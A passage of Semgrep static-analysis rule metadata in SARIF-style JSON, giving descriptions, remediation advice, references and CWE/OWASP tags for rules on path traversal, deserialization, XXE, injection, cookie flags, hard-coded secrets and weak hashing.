parsed is recommended."},"helpUri":"https://semgrep.dev/r/python.flask.deserialization.tainted-json-flask.tainted-json-flask","id":"python.flask.deserialization.tainted-json-flask.tainted-json-flask","name":"python.flask.deserialization.tainted-json-flask.tainted-json-flask","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","HIGH CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.deserialization.tainted-json-flask.tainted-json-flask"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Detected a potential path traversal. A malicious actor could control the location of this file, to include going backwards in the directory with '../'. To address this, ensure that user-controlled variables in file paths are sanitized. You may also consider using a utility method such as org.apache.commons.io.FilenameUtils.getName(...) to only retrieve the file name from the path."},"help":{"markdown":"Detected a potential path traversal. A malicious actor could control the location of this file, to include going backwards in the directory with '../'. To address this, ensure that user-controlled variables in file paths are sanitized. You may also consider using a utility method such as org.apache.commons.io.FilenameUtils.getName(...) to only retrieve the file name from the path.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.httpservlet-path-traversal.httpservlet-path-traversal)\n - [https://www.owasp.org/index.php/Path_Traversal](https://www.owasp.org/index.php/Path_Traversal)\n","text":"Detected a potential path traversal. A malicious actor could control the location of this file, to include going backwards in the directory with '../'. To address this, ensure that user-controlled variables in file paths are sanitized. You may also consider using a utility method such as org.apache.commons.io.FilenameUtils.getName(...) to only retrieve the file name from the path."},"helpUri":"https://semgrep.dev/r/java.lang.security.httpservlet-path-traversal.httpservlet-path-traversal","id":"java.lang.security.httpservlet-path-traversal.httpservlet-path-traversal","name":"java.lang.security.httpservlet-path-traversal.httpservlet-path-traversal","properties":{"precision":"very-high","tags":["CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')","MEDIUM CONFIDENCE","OWASP-A01:2021 - Broken Access Control","OWASP-A05:2017 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.httpservlet-path-traversal.httpservlet-path-traversal"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"abi.encodePacked hash collision with variable length arguments in $F()"},"help":{"markdown":"abi.encodePacked hash collision with variable length arguments in $F()\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/solidity.security.encode-packed-collision.encode-packed-collision)\n - [https://swcregistry.io/docs/SWC-133](https://swcregistry.io/docs/SWC-133)\n","text":"abi.encodePacked hash collision with variable length arguments in $F()"},"helpUri":"https://semgrep.dev/r/solidity.security.encode-packed-collision.encode-packed-collision","id":"solidity.security.encode-packed-collision.encode-packed-collision","name":"solidity.security.encode-packed-collision.encode-packed-collision","properties":{"precision":"very-high","tags":["CWE-20: Improper Input Validation","HIGH CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: solidity.security.encode-packed-collision.encode-packed-collision"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected a cookie where the `HttpOnly` flag is either missing or disabled. The `HttpOnly` cookie flag instructs the browser to forbid client-side JavaScript to read the cookie. If JavaScript interaction is required, you can ignore this finding. However, set the `HttpOnly` flag to `true` in all other cases. If this wasn't intentional, it's recommended to set the HttpOnly flag to true so the cookie will not be accessible through client-side scripts or to use the Cookie Policy Middleware to globally set the HttpOnly flag. You can then use the CookieOptions class when instantiating the cookie, which inherits these settings and will require future developers to have to explicitly override them on a case-by-case basis if needed. This approach ensures cookies are secure by default."},"help":{"markdown":"Detected a cookie where the `HttpOnly` flag is either missing or disabled. The `HttpOnly` cookie flag instructs the browser to forbid client-side JavaScript to read the cookie. If JavaScript interaction is required, you can ignore this finding. However, set the `HttpOnly` flag to `true` in all other cases. If this wasn't intentional, it's recommended to set the HttpOnly flag to true so the cookie will not be accessible through client-side scripts or to use the Cookie Policy Middleware to globally set the HttpOnly flag. You can then use the CookieOptions class when instantiating the cookie, which inherits these settings and will require future developers to have to explicitly override them on a case-by-case basis if needed. This approach ensures cookies are secure by default.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/csharp.lang.audit.cookies.httponly-false.httponly-false)\n - [https://learn.microsoft.com/en-us/aspnet/core/security/authentication/cookie?view=aspnetcore-8.0#cookie-policy-middleware](https://learn.microsoft.com/en-us/aspnet/core/security/authentication/cookie?view=aspnetcore-8.0#cookie-policy-middleware)\n - [https://learn.microsoft.com/en-us/dotnet/api/microsoft.aspnetcore.http.cookieoptions](https://learn.microsoft.com/en-us/dotnet/api/microsoft.aspnetcore.http.cookieoptions)\n - [https://owasp.org/Top10/A05_2021-Security_Misconfiguration](https://owasp.org/Top10/A05_2021-Security_Misconfiguration)\n","text":"Detected a cookie where the `HttpOnly` flag is either missing or disabled. The `HttpOnly` cookie flag instructs the browser to forbid client-side JavaScript to read the cookie. If JavaScript interaction is required, you can ignore this finding. However, set the `HttpOnly` flag to `true` in all other cases. If this wasn't intentional, it's recommended to set the HttpOnly flag to true so the cookie will not be accessible through client-side scripts or to use the Cookie Policy Middleware to globally set the HttpOnly flag. You can then use the CookieOptions class when instantiating the cookie, which inherits these settings and will require future developers to have to explicitly override them on a case-by-case basis if needed. This approach ensures cookies are secure by default."},"helpUri":"https://semgrep.dev/r/csharp.lang.audit.cookies.httponly-false.httponly-false","id":"csharp.lang.audit.cookies.httponly-false.httponly-false","name":"csharp.lang.audit.cookies.httponly-false.httponly-false","properties":{"precision":"very-high","tags":["CWE-1004: Sensitive Cookie Without 'HttpOnly' Flag","HIGH CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: csharp.lang.audit.cookies.httponly-false.httponly-false"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"XPath queries are constructed dynamically on user-controlled input. This could lead to XPath injection if variables passed into the evaluate or compile commands are not properly sanitized. Xpath injection could lead to unauthorized access to sensitive information in XML documents. Thoroughly sanitize user input or use parameterized XPath queries if you can. The xml parsing library are safe from several known high-impact vulnerabilities such as external entity expansion and DTD retrieval. However, search queries in the XML documents are still vulnerable to XPath injection attacks."},"help":{"markdown":"XPath queries are constructed dynamically on user-controlled input. This could lead to XPath injection if variables passed into the evaluate or compile commands are not properly sanitized. Xpath injection could lead to unauthorized access to sensitive information in XML documents. Thoroughly sanitize user input or use parameterized XPath queries if you can. The xml parsing library are safe from several known high-impact vulnerabilities such as external entity expansion and DTD retrieval. However, search queries in the XML documents are still vulnerable to XPath injection attacks.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.django.xml.tainted-django-xml-xpath-stdlib.tainted-django-xml-xpath-stdlib)\n - [https://cheatsheetseries.owasp.org/cheatsheets/XML_Security_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/XML_Security_Cheat_Sheet.html)\n - [https://docs.python.org/3/library/xml.html#xml-vulnerabilities](https://docs.python.org/3/library/xml.html#xml-vulnerabilities)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n - [https://owasp.org/www-community/vulnerabilities/XML_External_Entity_(XXE)_Processing](https://owasp.org/www-community/vulnerabilities/XML_External_Entity_(XXE)_Processing)\n - [https://pypi.org/project/defusedxml/](https://pypi.org/project/defusedxml/)\n","text":"XPath queries are constructed dynamically on user-controlled input. This could lead to XPath injection if variables passed into the evaluate or compile commands are not properly sanitized. Xpath injection could lead to unauthorized access to sensitive information in XML documents. Thoroughly sanitize user input or use parameterized XPath queries if you can. The xml parsing library are safe from several known high-impact vulnerabilities such as external entity expansion and DTD retrieval. However, search queries in the XML documents are still vulnerable to XPath injection attacks."},"helpUri":"https://semgrep.dev/r/python.django.xml.tainted-django-xml-xpath-stdlib.tainted-django-xml-xpath-stdlib","id":"python.django.xml.tainted-django-xml-xpath-stdlib.tainted-django-xml-xpath-stdlib","name":"python.django.xml.tainted-django-xml-xpath-stdlib.tainted-django-xml-xpath-stdlib","properties":{"precision":"very-high","tags":["CWE-643: Improper Neutralization of Data within XPath Expressions ('XPath Injection')","HIGH CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.django.xml.tainted-django-xml-xpath-stdlib.tainted-django-xml-xpath-stdlib"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Used SnakeYAML org.yaml.snakeyaml.Yaml() constructor with no arguments, which is vulnerable to deserialization attacks. Use the one-argument Yaml(...) constructor instead, with SafeConstructor or a custom Constructor as the argument."},"help":{"markdown":"Used SnakeYAML org.yaml.snakeyaml.Yaml() constructor with no arguments, which is vulnerable to deserialization attacks. Use the one-argument Yaml(...) constructor instead, with SafeConstructor or a custom Constructor as the argument.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.use-snakeyaml-constructor.use-snakeyaml-constructor)\n - [https://securitylab.github.com/research/swagger-yaml-parser-vulnerability/#snakeyaml-deserialization-vulnerability](https://securitylab.github.com/research/swagger-yaml-parser-vulnerability/#snakeyaml-deserialization-vulnerability)\n","text":"Used SnakeYAML org.yaml.snakeyaml.Yaml() constructor with no arguments, which is vulnerable to deserialization attacks. Use the one-argument Yaml(...) constructor instead, with SafeConstructor or a custom Constructor as the argument."},"helpUri":"https://semgrep.dev/r/java.lang.security.use-snakeyaml-constructor.use-snakeyaml-constructor","id":"java.lang.security.use-snakeyaml-constructor.use-snakeyaml-constructor","name":"java.lang.security.use-snakeyaml-constructor.use-snakeyaml-constructor","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","LOW CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.use-snakeyaml-constructor.use-snakeyaml-constructor"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.redis.python-redis-hardcoded-uri.python-redis-hardcoded-uri)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/python.redis.python-redis-hardcoded-uri.python-redis-hardcoded-uri","id":"python.redis.python-redis-hardcoded-uri.python-redis-hardcoded-uri","name":"python.redis.python-redis-hardcoded-uri.python-redis-hardcoded-uri","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.redis.python-redis-hardcoded-uri.python-redis-hardcoded-uri"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application might dynamically evaluate untrusted input, which can lead to a code injection vulnerability. An attacker can execute arbitrary code, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing code containing user input. If this is unavoidable, validate and sanitize the input, and use safe alternatives for evaluating user input."},"help":{"markdown":"The application might dynamically evaluate untrusted input, which can lead to a code injection vulnerability. An attacker can execute arbitrary code, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing code containing user input. If this is unavoidable, validate and sanitize the input, and use safe alternatives for evaluating user input.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/csharp.dotnet-core.code-injection.compile-taint-grpc.compile-taint-grpc)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"The application might dynamically evaluate untrusted input, which can lead to a code injection vulnerability. An attacker can execute arbitrary code, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing code containing user input. If this is unavoidable, validate and sanitize the input, and use safe alternatives for evaluating user input."},"helpUri":"https://semgrep.dev/r/csharp.dotnet-core.code-injection.compile-taint-grpc.compile-taint-grpc","id":"csharp.dotnet-core.code-injection.compile-taint-grpc.compile-taint-grpc","name":"csharp.dotnet-core.code-injection.compile-taint-grpc.compile-taint-grpc","properties":{"precision":"very-high","tags":["CWE-94: Improper Control of Generation of Code ('Code Injection')","HIGH CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: csharp.dotnet-core.code-injection.compile-taint-grpc.compile-taint-grpc"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"If unverified user data can reach the `addInitScript` method it can result in Server-Side Request Forgery vulnerabilities"},"help":{"markdown":"If unverified user data can reach the `addInitScript` method it can result in Server-Side Request Forgery vulnerabilities\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.playwright.security.audit.playwright-addinitscript-code-injection.playwright-addinitscript-code-injection)\n - [https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29](https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29)\n","text":"If unverified user data can reach the `addInitScript` method it can result in Server-Side Request Forgery vulnerabilities"},"helpUri":"https://semgrep.dev/r/javascript.playwright.security.audit.playwright-addinitscript-code-injection.playwright-addinitscript-code-injection","id":"javascript.playwright.security.audit.playwright-addinitscript-code-injection.playwright-addinitscript-code-injection","name":"javascript.playwright.security.audit.playwright-addinitscript-code-injection.playwright-addinitscript-code-injection","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","LOW CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.playwright.security.audit.playwright-addinitscript-code-injection.playwright-addinitscript-code-injection"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"SonarQube Docs API Key detected"},"help":{"markdown":"SonarQube Docs API Key detected\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/generic.secrets.security.detected-sonarqube-docs-api-key.detected-sonarqube-docs-api-key)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"SonarQube Docs API Key detected"},"helpUri":"https://semgrep.dev/r/generic.secrets.security.detected-sonarqube-docs-api-key.detected-sonarqube-docs-api-key","id":"generic.secrets.security.detected-sonarqube-docs-api-key.detected-sonarqube-docs-api-key","name":"generic.secrets.security.detected-sonarqube-docs-api-key.detected-sonarqube-docs-api-key","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","LOW CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: generic.secrets.security.detected-sonarqube-docs-api-key.detected-sonarqube-docs-api-key"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. In Flask apps, consider using the Werkzeug util `werkzeug.utils.secure_filename()` to sanitize paths and filenames."},"help":{"markdown":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. In Flask apps, consider using the Werkzeug util `werkzeug.utils.secure_filename()` to sanitize paths and filenames.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.file.tainted-pickleshare-flask.tainted-pickleshare-flask)\n - [https://docs.pyfilesystem.org/en/latest/guide.html#opening-filesystems](https://docs.pyfilesystem.org/en/latest/guide.html#opening-filesystems)\n - [https://flask.palletsprojects.com/en/2.3.x/patterns/fileuploads/](https://flask.palletsprojects.com/en/2.3.x/patterns/fileuploads/)\n - [https://owasp.org/Top10/A01_2021-Broken_Access_Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control)\n - [https://owasp.org/www-community/attacks/Path_Traversal](https://owasp.org/www-community/attacks/Path_Traversal)\n - [https://portswigger.net/web-security/file-path-traversal](https://portswigger.net/web-security/file-path-traversal)\n - [https://werkzeug.palletsprojects.com/en/3.0.x/utils/#werkzeug.utils.secure_filename](https://werkzeug.palletsprojects.com/en/3.0.x/utils/#werkzeug.utils.secure_filename)\n","text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. In Flask apps, consider using the Werkzeug util `werkzeug.utils.secure_filename()` to sanitize paths and filenames."},"helpUri":"https://semgrep.dev/r/python.flask.file.tainted-pickleshare-flask.tainted-pickleshare-flask","id":"python.flask.file.tainted-pickleshare-flask.tainted-pickleshare-flask","name":"python.flask.file.tainted-pickleshare-flask.tainted-pickleshare-flask","properties":{"precision":"very-high","tags":["CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')","HIGH CONFIDENCE","OWASP-A01:2021 - Broken Access Control","OWASP-A05:2017 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.file.tainted-pickleshare-flask.tainted-pickleshare-flask"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Detected a `$IMPORT` statement that comes from a `$REQ` argument. This could lead to NoSQL injection if the variable is user-controlled and is not properly sanitized. Be sure to properly sanitize the data if you absolutely must pass request data into a mongo query."},"help":{"markdown":"Detected a `$IMPORT` statement that comes from a `$REQ` argument. This could lead to NoSQL injection if the variable is user-controlled and is not properly sanitized. Be sure to properly sanitize the data if you absolutely must pass request data into a mongo query.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.express.mongodb.express-mongo-nosqli.express-mongo-nosqli)\n - [https://owasp.org/www-pdf-archive/GOD16-NOSQL.pdf](https://owasp.org/www-pdf-archive/GOD16-NOSQL.pdf)\n","text":"Detected a `$IMPORT` statement that comes from a `$REQ` argument. This could lead to NoSQL injection if the variable is user-controlled and is not properly sanitized. Be sure to properly sanitize the data if you absolutely must pass request data into a mongo query."},"helpUri":"https://semgrep.dev/r/javascript.express.mongodb.express-mongo-nosqli.express-mongo-nosqli","id":"javascript.express.mongodb.express-mongo-nosqli.express-mongo-nosqli","name":"javascript.express.mongodb.express-mongo-nosqli.express-mongo-nosqli","properties":{"precision":"very-high","tags":["CWE-943: Improper Neutralization of Special Elements in Data Query Logic","MEDIUM CONFIDENCE","OWASP-A01:2017 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.express.mongodb.express-mongo-nosqli.express-mongo-nosqli"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) or XIncludes which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a `Billion Laughs Attack`. It is our recommendation to secure this parser against XXE attacks by configuring the parser with `factory.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true)`. Alternatively, enabling both of the following configurations also provides protection against XXE attacks. `factory.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD,\"\")` and `factory.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, \"\")`. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)"},"help":{"markdown":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) or XIncludes which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a `Billion Laughs Attack`. It is our recommendation to secure this parser against XXE attacks by configuring the parser with `factory.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true)`. Alternatively, enabling both of the following configurations also provides protection against XXE attacks. `factory.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD,\"\")` and `factory.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, \"\")`. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.spring.security.xxe.tainted-schemafactory-xxe-spring.tainted-schemafactory-xxe-spring)\n - [https://blog.sonarsource.com/secure-xml-processor/](https://blog.sonarsource.com/secure-xml-processor/)\n - [https://blog.sonarsource.com/understanding-xxe-vulnerabilities/](https://blog.sonarsource.com/understanding-xxe-vulnerabilities/)\n - [https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html)\n - [https://cwe.mitre.org/data/definitions/611.html](https://cwe.mitre.org/data/definitions/611.html)\n - [https://cwe.mitre.org/data/definitions/776.html](https://cwe.mitre.org/data/definitions/776.html)\n - [https://docs.oracle.com/en/java/javase/13/security/java-api-xml-processing-jaxp-security-guide.html#GUID-D97A1F1D-8DDF-4D19-A7E5-99099F27346E](https://docs.oracle.com/en/java/javase/13/security/java-api-xml-processing-jaxp-security-guide.html#GUID-D97A1F1D-8DDF-4D19-A7E5-99099F27346E)\n - [https://github.com/semgrep/java-xxe-research](https://github.com/semgrep/java-xxe-research)\n - [https://owasp.org/Top10/A05_2021-Security_Misconfiguration](https://owasp.org/Top10/A05_2021-Security_Misconfiguration)\n - [https://rules.sonarsource.com/java/type/Vulnerability/RSPEC-2755](https://rules.sonarsource.com/java/type/Vulnerability/RSPEC-2755)\n","text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) or XIncludes which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a `Billion Laughs Attack`. It is our recommendation to secure this parser against XXE attacks by configuring the parser with `factory.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true)`. Alternatively, enabling both of the following configurations also provides protection against XXE attacks. `factory.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD,\"\")` and `factory.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, \"\")`. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)"},"helpUri":"https://semgrep.dev/r/java.spring.security.xxe.tainted-schemafactory-xxe-spring.tainted-schemafactory-xxe-spring","id":"java.spring.security.xxe.tainted-schemafactory-xxe-spring.tainted-schemafactory-xxe-spring","name":"java.spring.security.xxe.tainted-schemafactory-xxe-spring.tainted-schemafactory-xxe-spring","properties":{"precision":"very-high","tags":["CWE-611: Improper Restriction of XML External Entity Reference","HIGH CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: java.spring.security.xxe.tainted-schemafactory-xxe-spring.tainted-schemafactory-xxe-spring"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Checks for any usage of http servers instead of https servers. Encourages the usage of https protocol instead of http, which does not have TLS and is therefore unencrypted. Using http can lead to man-in-the-middle attacks in which the attacker is able to read sensitive information."},"help":{"markdown":"Checks for any usage of http servers instead of https servers. Encourages the usage of https protocol instead of http, which does not have TLS and is therefore unencrypted. Using http can lead to man-in-the-middle attacks in which the attacker is able to read sensitive information.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/problem-based-packs.insecure-transport.js-node.using-http-server.using-http-server)\n - [https://nodejs.org/api/http.html#http_class_http_agent](https://nodejs.org/api/http.html#http_class_http_agent)\n - [https://groups.google.com/g/rubyonrails-security/c/NCCsca7TEtY](https://groups.google.com/g/rubyonrails-security/c/NCCsca7TEtY)\n","text":"Checks for any usage of http servers instead of https servers. Encourages the usage of https protocol instead of http, which does not have TLS and is therefore unencrypted. Using http can lead to man-in-the-middle attacks in which the attacker is able to read sensitive information."},"helpUri":"https://semgrep.dev/r/problem-based-packs.insecure-transport.js-node.using-http-server.using-http-server","id":"problem-based-packs.insecure-transport.js-node.using-http-server.using-http-server","name":"problem-based-packs.insecure-transport.js-node.using-http-server.using-http-server","properties":{"precision":"very-high","tags":["CWE-319: Cleartext Transmission of Sensitive Information","LOW CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: problem-based-packs.insecure-transport.js-node.using-http-server.using-http-server"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The use of the MD5 hashing algorithm was identified which is considered insecure. MD5 is not collision resistant and is therefore not suitable for cryptographic or secure use-cases. Use stronger algorithms such as SHA256, SHA512, or adaptive hashing algorithms such as argon2 or bcrypt. **Note**: MD5 is still considered acceptable when used for Message Authentication Purposes, e.g. with HMAC although better and stronger algorithms should be strongly considered."},"help":{"markdown":"The use of the MD5 hashing algorithm was identified which is considered insecure. MD5 is not collision resistant and is therefore not suitable for cryptographic or secure use-cases. Use stronger algorithms such as SHA256, SHA512, or adaptive hashing algorithms such as argon2 or bcrypt. **Note**: MD5 is still considered acceptable when used for Message Authentication Purposes, e.g. with HMAC although better and stronger algorithms should be strongly considered.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/swift.commoncrypto.insecure-hashing-algorithm-md5.insecure-hashing-algorithm-md5)\n - [https://mobile-security.gitbook.io/masvs/security-requirements/0x08-v3-cryptography_verification_requirements](https://mobile-security.gitbook.io/masvs/security-requirements/0x08-v3-cryptography_verification_requirements)\n","text":"The use of the MD5 hashing algorithm was identified which is considered insecure. MD5 is not collision resistant and is therefore not suitable for cryptographic or secure use-cases. Use stronger algorithms such as SHA256, SHA512, or adaptive hashing algorithms such as argon2 or bcrypt. **Note**: MD5 is still considered acceptable when used for Message Authentication Purposes, e.g. with HMAC although better and stronger algorithms should be strongly considered."},"helpUri":"https://semgrep.dev/r/swift.commoncrypto.insecure-hashing-algorithm-md5.insecure-hashing-algorithm-md5","id":"swift.commoncrypto.insecure-hashing-algorithm-md5.insecure-hashing-algorithm-md5","name":"swift.commoncrypto.insecure-hashing-algorithm-md5.insecure-hashing-algorithm-md5","properties":{"precision":"very-high","tags":["CWE-327: Use of a Broken or Risky Cryptographic Algorithm","MEDIUM CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: swift.commoncrypto.insecure-hashing-algorithm-md5.insecure-hashing-algorithm-md5"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. PyYAML's `yaml` module is as powerful as `pickle` and so may call auny Python function. It is recommended to secure your application by using `yaml.SafeLoader` or `yaml.CSafeLoader`."},"help":{"markdown":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. PyYAML's `yaml` module is as powerful as `pickle` and so may call auny Python function. It is recommended to secure your application by using `yaml.SafeLoader` or `yaml.CSafeLoader`.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.aws-lambda.deserialization.tainted-pyyaml-aws-lambda.tainted-pyyaml-aws-lambda)\n - [https://cwe.mitre.org/data/definitions/502.html](https://cwe.mitre.org/data/definitions/502.html)\n - [https://github.com/yaml/pyyaml/wiki/PyYAML-yaml.load(input)-Deprecation](https://github.com/yaml/pyyaml/wiki/PyYAML-yaml.load(input)-Deprecation)\n - [https://knowledge-base.secureflag.com/vulnerabilities/unsafe_deserialization/unsafe_deserialization_python.html](https://knowledge-base.secureflag.com/vulnerabilities/unsafe_deserialization/unsafe_deserialization_python.html)\n - [https://nvd.nist.gov/vuln/detail/CVE-2017-18342](https://nvd.nist.gov/vuln/detail/CVE-2017-18342)\n - [https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures](https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures)\n - [https://portswigger.net/web-security/deserialization](https://portswigger.net/web-security/deserialization)\n","text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. PyYAML's `yaml` module is as powerful as `pickle` and so may call auny Python function. It is recommended to secure your application by using `yaml.SafeLoader` or 